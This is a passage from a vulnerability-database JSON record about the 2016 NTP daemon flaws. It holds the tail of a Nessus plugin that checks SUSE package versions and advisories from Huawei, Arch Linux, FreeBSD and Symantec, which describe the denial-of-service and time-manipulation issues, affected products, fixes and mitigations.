value:\"https://www.suse.com/security/cve/CVE-2015-8140/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7426/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7427/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7428/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7429/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7431/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7433/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7434/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-9310/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-9311/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20163193-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f2cf838e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-ntp-12895=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-ntp-12895=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"ntp-4.2.8p9-57.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"ntp-doc-4.2.8p9-57.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "huawei": [{"lastseen": "2019-02-01T18:02:17", "bulletinFamily": "software", "cvelist": ["CVE-2016-7434", "CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7427", "CVE-2016-7429", "CVE-2016-7428", "CVE-2016-9310", "CVE-2016-7426", "CVE-2016-7431"], "description": "Products\n\nSwitches\nRouters\nWLAN\nServers\nSee All\n\n\n\nSolutions\n\nCloud Data Center\nEnterprise Networking\nWireless Private Network\nSolutions by Industry\nSee All\n\n\n\nServices\n\nTraining and Certification\nICT Lifecycle Services\nTechnology Services\nIndustry Solution Services\nSee All\n\n\n\nSee all offerings at e.huawei.com\n\n\n\nNeed Support ?\n\nProduct Support\nSoftware Download\nCommunity\nTools\n\nGo to Full Support", "edition": 1, "modified": "2017-11-29T00:00:00", "published": "2017-11-29T00:00:00", "id": "HUAWEI-SA-20171129-01-NTPD", "href": "https://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20171129-01-ntpd-en", "title": "Security Advisory - Multiple NTPd Vulnerabilities in Huawei Products", "type": "huawei", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "archlinux": [{"lastseen": "2020-09-22T18:36:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7426", "CVE-2016-7427", "CVE-2016-7428", "CVE-2016-7429", "CVE-2016-7431", "CVE-2016-7433", "CVE-2016-7434", "CVE-2016-9310", "CVE-2016-9311"], "description": "Arch Linux Security Advisory ASA-201611-28\n==========================================\n\nSeverity: High\nDate : 2016-11-26\nCVE-ID : CVE-2016-7426 CVE-2016-7427 CVE-2016-7428 CVE-2016-7429\nCVE-2016-7431 CVE-2016-7433 CVE-2016-7434 CVE-2016-9310\nCVE-2016-9311\nPackage : ntp\nType : multiple issues\nRemote : Yes\nLink : https://wiki.archlinux.org/index.php/CVE\n\nSummary\n=======\n\nThe package ntp before version 4.2.8.p9-1 is vulnerable to multiple\nissues including denial of service, insufficient validation and\nincorrect calculation.\n\nResolution\n==========\n\nUpgrade to 4.2.8.p9-1.\n\n# pacman -Syu \"ntp>=4.2.8.p9-1\"\n\nThe problems have been fixed upstream in version 4.2.8.p9.\n\nWorkaround\n==========\n\nA partial fix to some of the issues is to implement BCP-38, use\n\"restrict default noquery ...\" in your ntp.conf file and only allow\nmode 6 queries from trusted networks and hosts.\n\nDescription\n===========\n\n- CVE-2016-7426 (denial of service)\n\nWhen ntpd is configured with rate limiting for all associations\n(restrict default limited in ntp.conf), the limits are applied also to\nresponses received from its configured sources. An attacker who knows\nthe sources (e.g., from an IPv4 refid in server response) and knows the\nsystem is (mis)configured in this way can periodically send packets\nwith spoofed source address to keep the rate limiting activated and\nprevent ntpd from accepting valid responses from its sources.\n\n- CVE-2016-7427 (denial of service)\n\nThe broadcast mode of NTP is expected to only be used in a trusted\nnetwork. If the broadcast network is accessible to an attacker, a\npotentially exploitable denial of service vulnerability in ntpd's\nbroadcast mode replay prevention functionality can be abused. An\nattacker with access to the NTP broadcast domain can periodically\ninject specially crafted broadcast mode NTP packets into the broadcast\ndomain which, while being logged by ntpd, can cause ntpd to reject\nbroadcast mode packets from legitimate NTP broadcast servers.\n\n- CVE-2016-7428 (denial of service)\n\nThe broadcast mode of NTP is expected to only be used in a trusted\nnetwork. If the broadcast network is accessible to an attacker, a\npotentially exploitable denial of service vulnerability in ntpd's\nbroadcast mode poll interval enforcement functionality can be abused.\nTo limit abuse, ntpd restricts the rate at which each broadcast\nassociation will process incoming packets. ntpd will reject broadcast\nmode packets that arrive before the poll interval specified in the\npreceding broadcast packet expires. An attacker with access to the NTP\nbroadcast domain can send specially crafted broadcast mode NTP packets\nto the broadcast domain which, while being logged by ntpd, will cause\nntpd to reject broadcast mode packets from legitimate NTP broadcast\nservers.\n\n- CVE-2016-7429 (denial of service)\n\nWhen ntpd receives a server response on a socket that corresponds to a\ndifferent interface than was used for the request, the peer structure\nis updated to use the interface for new requests. If ntpd is running on\na host with multiple interfaces in separate networks and the operating\nsystem doesn't check source address in received packets (e.g. rp_filter\non Linux is set to 0), an attacker that knows the address of the source\ncan send a packet with spoofed source address which will cause ntpd to\nselect wrong interface for the source and prevent it from sending new\nrequests until the list of interfaces is refreshed, which happens on\nrouting changes or every 5 minutes by default. If the attack is\nrepeated often enough (once per second), ntpd will not be able to\nsynchronize with the source.\n\n- CVE-2016-7431 (insufficient validation)\n\nZero Origin timestamp problems were fixed by Bug 2945 in ntp-4.2.8p6.\nHowever, subsequent timestamp validation checks introduced a regression\nin the handling of some Zero origin timestamp checks.\n\n- CVE-2016-7433 (incorrect calculation)\n\nntpd Bug 2085 described a condition where the root delay was included\ntwice, causing the jitter value to be higher than expected. Due to a\nmisinterpretation of a small-print variable in The Book, the fix for\nthis problem was incorrect, resulting in a root distance that did not\ninclude the peer dispersion. The calculations and formula have been\nreviewed and reconciled, and the code has been updated accordingly.\n\n- CVE-2016-7434 (denial of service)\n\nIf ntpd is configured to allow mrulist query requests from a server\nthat sends a crafted malicious packet, ntpd will crash on receipt of\nthat crafted malicious mrulist query packet.\n\n- CVE-2016-9310 (denial of service)\n\nAn exploitable configuration modification vulnerability exists in the\ncontrol mode (mode 6) functionality of ntpd. If, against long-standing\nBCP recommendations, \"restrict default noquery ...\" is not specified, a\nspecially crafted control mode packet can set ntpd traps, providing\ninformation disclosure and DDoS amplification, and unset ntpd traps,\ndisabling legitimate monitoring. A remote, unauthenticated, network\nattacker can trigger this vulnerability.\n\n- CVE-2016-9311 (denial of service)\n\nntpd does not enable trap service by default. If trap service has been\nexplicitly enabled, an attacker can send a specially crafted packet to\ncause a null pointer dereference that will crash ntpd, resulting in a\ndenial of service.\n\nImpact\n======\n\nA remote unauthenticated attacker may be able to perform a denial of\nservice attack on ntpd via multiple vectors.\n\nReferences\n==========\n\nhttp://support.ntp.org/bin/view/Main/SecurityNotice#November_2016_ntp_4_2_8p9_NTP_Se\nhttp://www.kb.cert.org/vuls/id/633847\nhttp://support.ntp.org/bin/view/Main/NtpBug3071\nhttp://support.ntp.org/bin/view/Main/NtpBug3114\nhttp://support.ntp.org/bin/view/Main/NtpBug3113\nhttp://support.ntp.org/bin/view/Main/NtpBug3072\nhttp://support.ntp.org/bin/view/Main/NtpBug3102\nhttp://support.ntp.org/bin/view/Main/NtpBug3067\nhttp://bugs.ntp.org/show_bug.cgi?id=2085\nhttp://support.ntp.org/bin/view/Main/NtpBug3082\nhttp://support.ntp.org/bin/view/Main/NtpBug3118\nhttp://support.ntp.org/bin/view/Main/NtpBug3119\nhttps://access.redhat.com/security/cve/CVE-2016-7426\nhttps://access.redhat.com/security/cve/CVE-2016-7427\nhttps://access.redhat.com/security/cve/CVE-2016-7428\nhttps://access.redhat.com/security/cve/CVE-2016-7429\nhttps://access.redhat.com/security/cve/CVE-2016-7431\nhttps://access.redhat.com/security/cve/CVE-2016-7433\nhttps://access.redhat.com/security/cve/CVE-2016-7434\nhttps://access.redhat.com/security/cve/CVE-2016-9310\nhttps://access.redhat.com/security/cve/CVE-2016-9311", "modified": "2016-11-26T00:00:00", "published": "2016-11-26T00:00:00", "id": "ASA-201611-28", "href": "https://security.archlinux.org/ASA-201611-28", "type": "archlinux", "title": "[ASA-201611-28] ntp: multiple issues", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:24", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7434", "CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7427", "CVE-2016-7428", "CVE-2016-9310", "CVE-2016-7426", "CVE-2016-7431"], "description": "\nProblem Description:\nMultiple vulnerabilities have been discovered in the NTP\n\tsuite:\nCVE-2016-9311: Trap crash, Reported by Matthew Van Gundy\n\tof Cisco ASIG.\nCVE-2016-9310: Mode 6 unauthenticated trap information\n\tdisclosure and DDoS vector. Reported by Matthew Van Gundy\n\tof Cisco ASIG.\nCVE-2016-7427: Broadcast Mode Replay Prevention DoS.\n\tReported by Matthew Van Gundy of Cisco ASIG.\nCVE-2016-7428: Broadcast Mode Poll Interval Enforcement\n\tDoS. Reported by Matthew Van Gundy of Cisco ASIG.\nCVE-2016-7431: Regression: 010-origin: Zero Origin\n\tTimestamp Bypass. Reported by Sharon Goldberg and Aanchal\n\tMalhotra of Boston University.\nCVE-2016-7434: Null pointer dereference in\n\t_IO_str_init_static_internal(). Reported by Magnus Stubman.\nCVE-2016-7426: Client rate limiting and server responses.\n\tReported by Miroslav Lichvar of Red Hat.\nCVE-2016-7433: Reboot sync calculation problem. Reported\n\tindependently by Brian Utterback of Oracle, and by Sharon\n\tGoldberg and Aanchal Malhotra of Boston University.\nImpact:\nA remote attacker who can send a specially crafted packet\n\tto cause a NULL pointer dereference that will crash ntpd,\n\tresulting in a Denial of Service. [CVE-2016-9311]\nAn exploitable configuration modification vulnerability\n\texists in the control mode (mode 6) functionality of ntpd.\n\tIf, against long-standing BCP recommendations, \"restrict\n\tdefault noquery ...\" is not specified, a specially crafted\n\tcontrol mode packet can set ntpd traps, providing information\n\tdisclosure and DDoS amplification, and unset ntpd traps,\n\tdisabling legitimate monitoring by an attacker from remote.\n\t[CVE-2016-9310]\nAn attacker with access to the NTP broadcast domain can\n\tperiodically inject specially crafted broadcast mode NTP\n\tpackets into the broadcast domain which, while being logged\n\tby ntpd, can cause ntpd to reject broadcast mode packets\n\tfrom legitimate NTP broadcast servers. [CVE-2016-7427]\nAn attacker with access to the NTP broadcast domain can\n\tsend specially crafted broadcast mode NTP packets to the\n\tbroadcast domain which, while being logged by ntpd, will\n\tcause ntpd to reject broadcast mode packets from legitimate\n\tNTP broadcast servers. [CVE-2016-7428]\nOrigin timestamp problems were fixed in ntp 4.2.8p6.\n\tHowever, subsequent timestamp validation checks introduced\n\ta regression in the handling of some Zero origin timestamp\n\tchecks. [CVE-2016-7431]\nIf ntpd is configured to allow mrulist query requests\n\tfrom a server that sends a crafted malicious packet, ntpd\n\twill crash on receipt of that crafted malicious mrulist\n\tquery packet. [CVE-2016-7434]\nAn attacker who knows the sources (e.g., from an IPv4\n\trefid in server response) and knows the system is (mis)configured\n\tin this way can periodically send packets with spoofed\n\tsource address to keep the rate limiting activated and\n\tprevent ntpd from accepting valid responses from its sources.\n\t[CVE-2016-7426]\nNtp Bug 2085 described a condition where the root delay\n\twas included twice, causing the jitter value to be higher\n\tthan expected. Due to a misinterpretation of a small-print\n\tvariable in The Book, the fix for this problem was incorrect,\n\tresulting in a root distance that did not include the peer\n\tdispersion. The calculations and formulas have been reviewed\n\tand reconciled, and the code has been updated accordingly.\n\t[CVE-2016-7433]\n", "edition": 5, "modified": "2016-12-22T00:00:00", "published": "2016-12-22T00:00:00", "id": "FCEDCDBB-C86E-11E6-B1CF-14DAE9D210B8", "href": "https://vuxml.freebsd.org/freebsd/fcedcdbb-c86e-11e6-b1cf-14dae9d210b8.html", "title": "FreeBSD -- Multiple vulnerabilities of ntp", "type": "freebsd", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:32:28", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9312", "CVE-2016-7434", "CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7427", "CVE-2016-7429", "CVE-2016-7428", "CVE-2016-9310", "CVE-2016-7426", "CVE-2016-7431"], "description": "\nNetwork Time Foundation reports:\n\nNTF's NTP Project is releasing ntp-4.2.8p9, which addresses:\n\n1 HIGH severity vulnerability that only affects Windows\n2 MEDIUM severity vulnerabilities\n2 MEDIUM/LOW severity vulnerabilities\n5 LOW severity vulnerabilities\n28 other non-security fixes and improvements\n\nAll of the security issues in this release are listed in\n\t VU#633847.\n\n", "edition": 5, "modified": "2016-11-21T00:00:00", "published": "2016-11-21T00:00:00", "id": "8DB8D62A-B08B-11E6-8EBA-D050996490D0", "href": "https://vuxml.freebsd.org/freebsd/8db8d62a-b08b-11e6-8eba-d050996490d0.html", "title": "ntp -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "symantec": [{"lastseen": "2020-12-24T10:41:07", "bulletinFamily": "software", "cvelist": ["CVE-2016-7426", "CVE-2016-7427", "CVE-2016-7428", "CVE-2016-7429", "CVE-2016-7431", "CVE-2016-7433", "CVE-2016-7434", "CVE-2016-9310", "CVE-2016-9311", "CVE-2016-9312"], "description": "### SUMMARY\n\nSymantec Network Protection products using affected versions of the NTP reference implementation from ntp.org are susceptible to multiple vulnerabilities. A remote attacker can modify the target's system time, prevent the target from synchronizing its time, cause denial of service through NTP daemon crashes, perform DDoS attack amplification, and evade security monitoring in the NTP daemon. \n \n\n\n### AFFECTED PRODUCTS \n\nThe following products are vulnerable:\n\n**Content Analysis (CA)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 2.2 and later | Not vulnerable, fixed in 2.2.1.1 \nCVE-2016-7429, CVE-2016-7433 | 2.1 | Upgrade to later release with fixes. \n1.3 | Upgrade to later release with fixes. \nCVE-2016-7431 | 2.1 | Upgrade to later release with fixes. \n1.3.7.3, 1.3.7.4 | Upgrade to later release with fixes. \n \n \n\n**Director** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs except CVE-2016-7429 | 6.1 | Upgrade to 6.1.23.1. \n \n \n\n**Mail Threat Defense (MTD)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-7429, CVE-2016-7433 | 1.1 | Not available at this time \n \n \n\n**Management Center (MC)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-7431, CVE-2016-7433 | 1.11 and later | Not vulnerable, fixed in 1.11.1.1. \n1.10 | Upgrade to later release with fixes. \n1.9 | Upgrade to later release with fixes. \n1.8 | Upgrade to later release with fixes. \n \n \n\n**Reporter** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-7429, CVE-2016-7431, \nCVE-2016-7433 | 10.2 and later | Not vulnerable, fixed in 10.2.1.1. \n10.1 | Upgrade to 10.1.5.5. \nAll CVEs | 9.5 | Not vulnerable \nAll CVEs | 9.4 | Not vulnerable \n \n \n\n**Security Analytics** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 7.3 and later | Not vulnerable, fixed in 7.3.1. \nCVE-2016-7426, CVE-2016-7429, \nCVE-2016-7433, CVE-2016-9310, \nCVE-2016-9311 | 7.2 | Upgrade to 7.2.3. \n7.1 | Upgrade to later release with fixes. \n6.6 | Upgrade to later release with fixes. \nCVE-2016-7427, CVE-2016-7428, CVE-2016-7431, CVE-2016-7434 | 7.2.2 | Not available at this time \n7.1 with ntp-4.2.8p8 RPM patch | Upgrade to later release with fixes. \n6.6 with ntp-4.2.8p8 RPM patch | Upgrade to later release with fixes. \n \n \n\n**SSL Visibility (SSLV)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-7431, CVE-2016-7433 | 4.1 and later | Not vulnerable, fixed in 4.1.1.1. \n4.0 | Upgrade to later release with fixes. \n3.8, 3.8.4FC, 3.9, 3.10, 3.12 | Not vulnerable to known vectors of attack. \n \n \n\n**X-Series XOS** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-7426, CVE-2016-7429, \nCVE-2016-7433, CVE-2016-9310, \nCVE-2016-9311 | 11.0 | Not available at this time \n10.0 | Not available at this time \n9.7 | Upgrade to later release with fixes. \n \n \n\nThe following products contain a vulnerable version of the ntp.org NTP reference implementation, but are not vulnerable to known vectors of attack:\n\n**Advanced Secure Gateway (ASG)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 7.1 | Not vulnerable, fixed in 7.1.1.1 \n6.7 | Upgrade to 6.7.3.1. \n6.6 | Upgrade to later release with fixes. \n \n \n\n### ADDITIONAL PRODUCT INFORMATION\n\nSymantec Network Protection products do not enable or use all functionality within the ntp.org NTP reference implementation. The products listed below do not utilize the functionality described in the CVEs below and are thus not known to be vulnerable to them. However, fixes for these CVEs will be included in the patches that are provided.\n\n * **ASG:** all CVEs\n * **CA:** CVE-2016-7426, CVE-2016-7427, CVE-2016-7428, CVE-2016-7434, CVE-2016-9310, CVE-2016-9311, and CVE-2016-9312\n * **Director:** CVE-2016-7429\n * **MTD:** CVE-2016-7426, CVE-2016-9310, CVE-2016-9311, and CVE-2016-9312\n * **MC:** CVE-2016-7426, CVE-2016-7429, CVE-2016-9310, CVE-2016-9311, and CVE-2016-9312\n * **Reporter 10.1:** CVE-2016-7426, CVE-2016-7427, CVE-2016-7428, CVE-2016-7434, CVE-2016-9310, CVE-2016-9311, and CVE-2016-9312\n * **Security Analytics:** CVE-2016-9312\n * **SSLV 3.x and 4.x:** CVE-2016-7426, CVE-2016-7427, CVE-2016-7428, CVE-2016-7429 (4.0 only), CVE-2016-7434, CVE-2016-9310, CVE-2016-9311\n\nThe following products are not vulnerable: \n**Android Mobile Agent \nAuthConnector \nBCAAA \nSymantec HSM Agent for the Luna SP \nCacheFlow \nClient Connector \nCloud Data Protection for Salesforce \nCloud Data Protection for Salesforce Analytics \nCloud Data Protection for ServiceNow \nCloud Data Protection for Oracle CRM On Demand \n**Cloud Data Protection for Oracle Field Service Cloud** \nCloud Data Protection for Oracle Sales Cloud \nCloud Data Protection Integration Server \nCloud Data Protection Communication Server \nCloud Data Protection Policy Builder \nGeneral Auth Connector Login Application \nIntelligenceCenter \nIntelligenceCenter Data Collector \nK9 \nMalware Analysis \nNorman Shark Industrial Control System Protection \nNorman Shark Network Protection \nNorman Shark SCADA Protection \nPacketShaper \nPacketShaper S-Series \nPolicyCenter \nPolicyCenter S-Series \nProxyClient \nProxyAV \nProxyAV ConLog and ConLogXP \nProxySG \nUnified Agent \nWeb Isolation**\n\nSymantec no longer provides vulnerability information for the following products:\n\n**DLP** \nPlease, contact Digital Guardian technical support regarding vulnerability information for DLP. \n \n\n\n### ISSUES \n\n**CVE-2016-7426** \n--- \n**Severity / CVSSv2** | Medium / 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 94451](<https://www.securityfocus.com/bid/94451>) / NVD: [CVE-2016-7426](<https://nvd.nist.gov/vuln/detail/CVE-2016-7426>) \n**Impact** | Denial of service \n**Description** | A flaw in rate limiting allows a remote attacker to send NTP packets with spoofed source IP addresses and cause the target to reject legitimate packets from configured NTP servers. The attacker can thus prevent the target from synchronizing its system time. \n \n \n\n**CVE-2016-7427** \n--- \n**Severity / CVSSv2** | Low / 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 94447](<https://www.securityfocus.com/bid/94447>) / NVD: [CVE-2016-7427](<https://nvd.nist.gov/vuln/detail/CVE-2016-7427>) \n**Impact** | Denial of service \n**Description** | A flaw in NTP broadcast packet replay prevention allows a remote attacker with access to the NTP broadcast domain to send crafted broadcast packets and cause the target to reject legitimate packets from NTP broadcast servers. The attacker can thus prevent the target from synchronizing its system time. \n \n \n\n**CVE-2016-7428** \n--- \n**Severity / CVSSv2** | Low / 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 94446](<https://www.securityfocus.com/bid/94446>) / NVD: [CVE-2016-7428](<https://nvd.nist.gov/vuln/detail/CVE-2016-7428>) \n**Impact** | Denial of service \n**Description** | A flaw in NTP broadcast packet poll interval enforcement allows a remote attacker with access to the NTP broadcast domain to send crafted broadcast packets and cause the target to reject legitimate packets from NTP broadcast servers. The attacker can thus prevent the target from synchronizing its system time. \n \n \n\n**CVE-2016-7429** \n--- \n**Severity / CVSSv2** | Medium / 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 94453](<https://www.securityfocus.com/bid/94453>) / NVD: [CVE-2016-7429](<https://nvd.nist.gov/vuln/detail/CVE-2016-7429>) \n**Impact** | Denial of service \n**Description** | There is a flaw in the NTP daemon when it listens on multiple network interfaces and the operating system does not validate the source address of received packets. A remote attacker can send an NTP packet with a spoofed source IP address on an unexpected network interface to corrupt the NTP daemon's internal state and prevent it from synchronizing the system time. \n \n \n\n**CVE-2016-7431** \n--- \n**Severity / CVSSv2** | Medium / 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n**References** | SecurityFocus: [BID 94454](<https://www.securityfocus.com/bid/94454>) / NVD: [CVE-2016-7431](<https://nvd.nist.gov/vuln/detail/CVE-2016-7431>) \n**Impact** | Denial of service, unauthorized modification of time \n**Description** | A flaw in NTP packet origin timestamp validation allows a remote attacker to send crafted NTP packets and and either modify the target's system time or prevent it from synchronizing its time. \n \n \n\n**CVE-2016-7433** \n--- \n**Severity / CVSSv2** | Medium / 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 94455](<https://www.securityfocus.com/bid/94455>) / NVD: [CVE-2016-7433](<https://nvd.nist.gov/vuln/detail/CVE-2016-7433>) \n**Impact** | Unauthorized modification of time \n**Description** | A flaw in initial time synchronization allows a remote attacker to send a spoofed NTP response and modify the target's system time. \n \n \n\n**CVE-2016-7434** \n--- \n**Severity / CVSSv2** | Medium / 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 94448](<https://www.securityfocus.com/bid/94448>) / NVD: [CVE-2016-7434](<https://nvd.nist.gov/vuln/detail/CVE-2016-7434>) \n**Impact** | Denial of service \n**Description** | A flaw in mrulist query handling allows a remote attacker to send crafted query requests to the NTP daemon and cause it to crash, resulting in denial of service. \n \n \n\n**CVE-2016-9310** \n--- \n**Severity / CVSSv2** | Medium / 6.4 (AV:N/AC:L/Au:N/C:P/I:N/A:P) \n**References** | SecurityFocus: [BID 94452](<https://www.securityfocus.com/bid/94452>) / NVD: [CVE-2016-9310](<https://nvd.nist.gov/vuln/detail/CVE-2016-9310>) \n**Impact** | Information disclosure, DDoS amplification, security control bypass \n**Description** | A missing authorization flaw allows a remote attacker to send query requests and obtain sensitive information, perform DDoS attack amplification, and evade security monitoring in the target's NTP daemon. \n \n \n\n**CVE-2016-9311** \n--- \n**Severity / CVSSv2** | High / 7.1 (AV:N/AC:M/Au:N/C:N/I:N/A:C) \n**References** | SecurityFocus: [BID 94444](<https://www.securityfocus.com/bid/94444>) / NVD: [CVE-2016-9311](<https://nvd.nist.gov/vuln/detail/CVE-2016-9311>) \n**Impact** | Denial of service \n**Description** | A flaw in remote query handling allows a remote attacker to send crafted query requests to the NTP daemon and cause it to crash, resulting in denial of service. \n \n \n\n**CVE-2016-9312** \n--- \n**Severity / CVSSv2** | Medium / 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 94450](<https://www.securityfocus.com/bid/94450>) / NVD: [CVE-2016-9312](<https://nvd.nist.gov/vuln/detail/CVE-2016-9312>) \n**Impact** | Denial of service \n**Description** | A flaw in oversized packet handling on Windows platforms allows a remote attacker to send crafted NTP packets to the NTP daemon and cause it to crash, resulting in denial of service. \n \n \n\n### MITIGATION\n\nThese vulnerabilities can be exploited only through the management network port for CA, Director, MTD, MC, Security Analytics, SSLV, and XOS. Allowing only machines, IP addresses and subnets from a trusted network to access to the management network port reduces the threat of exploiting the vulnerabilities.\n\nBy default, Director does not enable unrestricted rate limiting, NTP broadcast mode, and remote querying in the NTP daemon. Customers who leave these NTP features disabled prevent attacks against Director using CVE-2016-7426, CVE-2016-7427, CVE-2016-7428, CVE-2016-7434, CVE-2016-9310, and CVE-2016-9311.\n\nBy default, Security Analytics does not enable unrestricted rate limiting, NTP broadcast mode, and remote querying in the NTP daemon. The Security Analytics NTP daemon also does not listen by default on multiple network interfaces. Customers who leave these NTP features disabled prevent attacks against Security Analytics using CVE-2016-7426, CVE-2016-7427, CVE-2016-7428, CVE-2016-7429, CVE-2016-7434, CVE-2016-9310, and CVE-2016-9311.\n\nBy default, XOS does not enable unrestricted rate limiting and remote querying in the NTP daemon. Customers who leave this behavior unchanged prevent attacks against XOS using CVE-2016-7426, CVE-2016-9310, and CVE-2016-9311. \n \n\n\n### REFERENCES\n\nNTP.org Security Notice - <https://support.ntp.org/bin/view/Main/SecurityNotice#November_2016_ntp_4_2_8p9_NTP_Se> \nVulnerability Note VU#633847 - 